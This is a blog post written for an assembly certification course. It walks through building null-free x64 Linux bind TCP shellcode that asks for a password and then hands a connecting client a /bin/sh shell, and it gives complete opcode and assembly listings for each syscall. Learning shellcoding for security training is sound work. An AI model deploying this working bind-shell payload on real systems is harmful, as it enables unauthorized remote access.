Blog


X64 Linux Bind TCP Shellcode with Authentication

Jul 22, 2018 | 11 minutes read

Tags: assembly, slae-64, shellcode

This post is the first of seven that will comprise my attempt at the SecurityTube Linux Assembly Expert (SLAE-64) certification. Each post will correspond to seven assignments of varying difficulty. I decided to take SLAE-64 to shore up my knowledge of assembly and shellcoding before diving in to OSCE.

Assignment #1 Requirements


  • Create bind TCP shellcode
    • Binds to a TCP port
    • When a client connects, client must send a password for authentication
    • If password is correct, execute the shell
  • Remove null-bytes (0x00) from the bind TCP shellcode discussed as part of the course and
  • Compress the size of the shellcode as much as possible

A Word on Size

I used nasmshell to figure out which instruction combinations resulted in the fewest number of non-null opcodes. For this assignment, I only used techniques taught within the course, or what I came across in documentation. Basically, I didn’t look at other shellcode examples except for what was covered in the course. My reasoning being that I could establish a performance baseline for myself. After I complete some of the other assignments that require me to analyze other people’s shellcode, I plan to come back and apply whatever fancy tricks I pick up as a result to this shellcode.

General Steps to Listen

The general steps to setup a listening socket can be listed out via a handful of linux syscalls as seen below.

  1. socket -> Create a socket
  2. bind -> Bind the socket to a local address
  3. listen -> Listens; prepares the socket to accept a connection
  4. accept -> Creates a new connected socket

After the accept syscall, operations may be performed on the socket such as recv/read and send/write. If you’re looking for a more in depth explanation of socket programming using syscalls, do yourself a favor and check out Beej’s Guide to Network Programming.

x64 Assembly Calling Conventions

To pass parameters to a syscall (since that is all this post is concerned with), up to six registers may be used and are shown below in the order in which they are to be populated. The syscall number itself will be stored in rax.

  1. rdi
  2. rsi
  3. rdx
  4. rcx
  5. r8
  6. r9


The following image illustrates that to use a C function definition, the arguments it accepts directly correspond to the registers above when read from left-to-right. I show this as a quick reference to assist in reading the assembly and syscall definitions below.

calling conventions

Create a Socket

The first step to create a bind shell on linux is to create a socket. Below you can see that the syscall number for socket is 41, and that it takes three int’s as arguments. socket() creates an endpoint for communication and returns a file descriptor that refers to that endpoint.

#define __NR_socket 41

int socket(int domain, int type, int protocol);
/*
 * rax -> 41 -> socket sycall
 * rdi -> 2 (AF_INET) -> domain
 * rsi -> 1 (SOCK_STREAM) -> type
 * rdx -> 0 -> protocol
 */

Python can be used to determine the values of the constants you would normally see used in C socket programming code.

>>> import socket
>>> socket.AF_INET
2
>>> socket.SOCK_STREAM
1
>>> socket.INADDR_ANY
0

First up, the original shellcode with null-bytes. On the left are the opcodes generated by the corresponding assembly instructions on the right. The gist of this snippet is that a socket is created with the socket syscall and the resulting file descriptor is stored in the rdi register. The resulting shellcode is 25 bytes long to make this single syscall and it’s riddled with null-bytes.

b8 29 00 00 00       	mov    eax,0x29
bf 02 00 00 00       	mov    edi,0x2
be 01 00 00 00       	mov    esi,0x1
ba 00 00 00 00       	mov    edx,0x0
0f 05                	syscall
48 89 c7             	mov    rdi,rax

Here is what I was able to come up with. 14 bytes long and no nulls.

6a 29                	push   0x29
58                   	pop    rax
6a 02                	push   0x2
5f                   	pop    rdi
6a 01                	push   0x1
5e                   	pop    rsi
31 d2                	xor    edx,edx
0f 05                	syscall
97                   	xchg   edi,eax    ; store file descriptor in rdi

Bind the Socket

When a socket is created with socket(), it exists in a name space (address family) but has no address assigned to it. bind() assigns the address specified by addr to the socket referred to by the file descriptor sockfd. This and all following sections will follow the same pattern as the first where the socket was created.

#define __NR_bind 49

int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen)
/* rax -> 49
 * rdi -> fd already stored in rdi
 * rsi -> pointer to 16 bytes of space groomed to contain a sockaddr_in struct
 * rdx -> length of rsi (16)
 */

struct sockaddr_in {
    sa_family_t    sin_family; /* address family: AF_INET */
    in_port_t      sin_port;   /* port in network byte order */
    struct in_addr sin_addr;   /* internet address */
};

Python can be used to convert a numeric port number into a format that sockaddr_in will understand.

>>> import socket
>>> port = 4444
>>> hex(socket.htons(port))
'0x5c11'

Original shellcode: 41 bytes

; prepare the 16 bytes to pass as sockaddr using the stack               
48 31 c0             	xor    rax,rax
50                   	push   rax
89 44 24 fc          	mov    DWORD PTR [rsp-0x4],eax
66 c7 44 24 fa 11 5c 	mov    WORD PTR [rsp-0x6],0x5c11
66 c7 44 24 f8 02 00 	mov    WORD PTR [rsp-0x8],0x2
48 83 ec 08          	sub    rsp,0x8

; make bind syscall
b8 31 00 00 00       	mov    eax,0x31
48 89 e6             	mov    rsi,rsp
ba 10 00 00 00       	mov    edx,0x10
0f 05                	syscall

My shellcode: 24 bytes

; prepare the 16 bytes to pass as sockaddr using the stack
; 2 pushes to get the 00 in between 0x5c11 and 02
52                   	push   rdx
52                   	push   rdx
66 c7 44 24 02 11 5c 	mov    WORD PTR [rsp+0x2],0x5c11
c6 04 24 02          	mov    BYTE PTR [rsp],0x2
48 89 e6             	mov    rsi,rsp

; make bind syscall
6a 31                	push   0x31
58                   	pop    rax
6a 10                	push   0x10
5a                   	pop    rdx
0f 05                	syscall

Listen on the Bound Socket

listen() marks the socket referred to by sockfd as a passive socket, that is, as a socket that will be used to accept incoming connection requests using accept(2).

#define __NR_listen 50

int listen(int sockfd, int backlog);
/* rax -> 50
 * rdi -> fd already stored in rdi
 * rsi -> 1
 */

Original shellcode: 12 bytes

b8 32 00 00 00       	mov    eax,0x32
be 02 00 00 00       	mov    esi,0x2
0f 05                	syscall

My shellcode: 8 bytes

6a 32                	push   0x32
58                   	pop    rax
6a 01                	push   0x1
5e                   	pop    rsi
0f 05                	syscall

Accept a Connection

The accept() system call is used with connection-based socket types (SOCK_STREAM, SOCK_SEQPACKET). It extracts the first connection request on the queue of pending connections for the listening socket, sockfd, creates a new connected socket, and returns a new file descriptor referring to that socket. The newly created socket is not in the listening state. The original socket sockfd is unaffected by this call.

The argument sockfd is a socket that has been created with socket(), bound to a local address with bind(), and is listening for connections after a listen().

#define __NR_accept 43

int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
/* rax -> 43
 * rdi -> fd already stored in rdi
 * rsi -> pointer to 16 bytes of space that will be populated by the client connection
 * rdx -> pointer to length of rsi (16)
 */

 struct sockaddr_in {
    sa_family_t    sin_family; /* address family: AF_INET */
    in_port_t      sin_port;   /* port in network byte order */
    struct in_addr sin_addr;   /* internet address */
};

Original shellcode: 29 bytes

b8 2b 00 00 00       	mov    eax,0x2b
48 83 ec 10          	sub    rsp,0x10
48 89 e6             	mov    rsi,rsp
c6 44 24 ff 10       	mov    BYTE PTR [rsp-0x1],0x10
48 83 ec 01          	sub    rsp,0x1
48 89 e2             	mov    rdx,rsp
0f 05                	syscall
49 89 c1             	mov    r9,rax

My shellcode: 19 bytes

6a 2b                	push   0x2b
58                   	pop    rax
99                   	cdq                 ; zero out rdx using sign extension
52                   	push   rdx
52                   	push   rdx
48 89 e6             	mov    rsi,rsp      ; when populated, client will be stored in rsi
6a 10                	push   0x10
48 8d 14 24          	lea    rdx,[rsp]
0f 05                	syscall

; store client socket descriptor in r9 to restore after closing the parent
49 91                	xchg   r9,rax

Close the Listener

This is the first section where I added additional logic to satisfy the authentication requirement. The close_call label gets reused in the event of a bad password. close() closes a file descriptor, so that it no longer refers to any file and may be reused.

#define __NR_close 3

int close(int fd);
/* rax -> 3
 * rdi -> fd already stored in rdi
 */

Original shellcode: 10 bytes

b8 03 00 00 00       	mov    eax,0x3
0f 05                	syscall
4c 89 cf             	mov    rdi,r9

My shellcode: 15 bytes

6a 03                	push   0x3
58                   	pop    rax
0f 05                	syscall

; restore client socket descriptor to rdi
4c 89 cf             	mov    rdi,r9       

; close gracefully if we get here from a bad password
74 07                	je     4000d2 <read_call>
6a 3c                	push   0x3c
58                   	pop    rax
0f 05                	syscall

Read in the Password

For this section, there is no original shellcode. I’ll just outline what mine is doing. read() attempts to read up to count bytes from file descriptor fd into the buffer starting at buf.

#define __NR_read 0

ssize_t read(int fd, void *buf, size_t count);
/* rax -> 0
 * rdi -> client already stored in rdi
 * rsi -> 24 bytes allocated should be good
 * rdx -> 24
 */

Python can be used to prepare the password to be stored on the stack.

>>> import binascii
>>> binascii.hexlify(b'letmein\n'[::-1])
'0a6e69656d74656c'

I wrote a small bash function that handles the above python instead of spinning up an interpreter each time I want a different string.

flipstring() {
    python3 -c "import binascii; print(binascii.hexlify(b'${1}'[::-1]))"
}

The two primary tasks here are to get user-input and compare it to our password.

; read the password
31 c0                	xor    eax,eax      ; zero out rax for the syscall number
48 83 ec 18          	sub    rsp,0x18     ; allocate 24 bytes on the stack
48 89 e6             	mov    rsi,rsp      ; make rsi point to those 24 bytes
6a 18                	push   0x18         
5a                   	pop    rdx          ; store the size of the buffer in rdx
0f 05                	syscall

; compare the password
48 b8 6c 65 74 6d 65 	movabs rax,0xa6e69656d74656c    ; password -> letmein\n
69 6e 0a
48 8d 3e             	lea    rdi,[rsi]                ; load user-input
48 af                	scas   rax,QWORD PTR es:[rdi]   ; compare rax and rdi
4c 89 cf             	mov    rdi,r9                   ; put client connection back in rdi
75 cf                	jne    4000c1 <close_call>      ; close socket if they're not equal

Duplicate File Descriptors

The dup() system call creates a copy of the file descriptor oldfd, using the lowest-numbered unused file descriptor for the new descriptor. After a successful return, the old and new file descriptors may be used interchangeably.

#define __NR_dup2 33

int dup2(int oldfd, int newfd);
/* rax -> 33
 * rdi -> client socket
 * rsi -> 2 -> 1 -> 0 (3 iterations)
 */

Original shellcode: 36 bytes

b8 21 00 00 00       	mov    eax,0x21
be 00 00 00 00       	mov    esi,0x0
0f 05                	syscall
b8 21 00 00 00       	mov    eax,0x21
be 01 00 00 00       	mov    esi,0x1
0f 05                	syscall
b8 21 00 00 00       	mov    eax,0x21
be 02 00 00 00       	mov    esi,0x2
0f 05                	syscall

My shellcode: 20 bytes

As a side-note, I really thought I was going to be able to make a small loop reusing rcx as file descriptor, but it didn’t turn out quite the way I thought it would. I think this is going to be a place in the code that I return to for some easy improvement later.

6a 03                	push   0x3
59                   	pop    rcx      ; # of iterations
6a 02                	push   0x2
5b                   	pop    rbx      ; used as file desciptor
00000000004000f8 <dup2_loop>:
6a 21                	push   0x21     
58                   	pop    rax
89 de                	mov    esi,ebx  ; 2 -> 1 -> 0 (3 iterations)
51                   	push   rcx      ; preserve counter across syscalls
0f 05                	syscall
59                   	pop    rcx
48 ff cb             	dec    rbx      
e2 f2                	loop   4000f8 <dup2_loop>

Exec /bin/sh

I modified this section a bit, but there wasn’t a whole lot of room for improvement that I could see. execve() executes the program pointed to by filename.

#define __NR_execve 59

int execve(const char *filename, char *const argv[], char *const envp[]);
/* rax -> 59
 * rdi -> "/bin//sh", 0x0
 * rsi -> [addr of bin/sh], 0x0
 * rdx -> 0x0
 */

Original shellcode: 32 bytes

48 31 c0             	xor    rax,rax
50                   	push   rax
48 bb 2f 62 69 6e 2f 	movabs rbx,0x68732f2f6e69622f
2f 73 68
53                   	push   rbx
48 89 e7             	mov    rdi,rsp
50                   	push   rax
48 89 e2             	mov    rdx,rsp
57                   	push   rdi
48 89 e6             	mov    rsi,rsp
48 83 c0 3b          	add    rax,0x3b
0f 05                	syscall

My shellcode: 28 bytes

31 d2                	xor    edx,edx
52                   	push   rdx
48 bb 2f 62 69 6e 2f 	movabs rbx,0x68732f2f6e69622f
2f 73 68
53                   	push   rbx
48 89 e7             	mov    rdi,rsp
52                   	push   rdx
57                   	push   rdi
48 89 e6             	mov    rsi,rsp
48 8d 42 3b          	lea    rax,[rdx+0x3b]
0f 05                	syscall

fin

Once the call to execve happens, the client now has a shell on the system. As far as the compression and removing nulls part of the assignment, nulls were successfully removed and the final tally of bytes:

  • Original shellcode: 185 bytes
  • My shellcode: 162 bytes

I’m still confident that there is a lot of room for improvement on my part. My plan is to revisit the first and second assignments and apply any new concepts I learn while performing the shellcode analysis of later assignments. Feel free to check out the source code.


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert
Student ID: E64-1584
My SLAE-64 Assignments Repository


comments powered by Disqus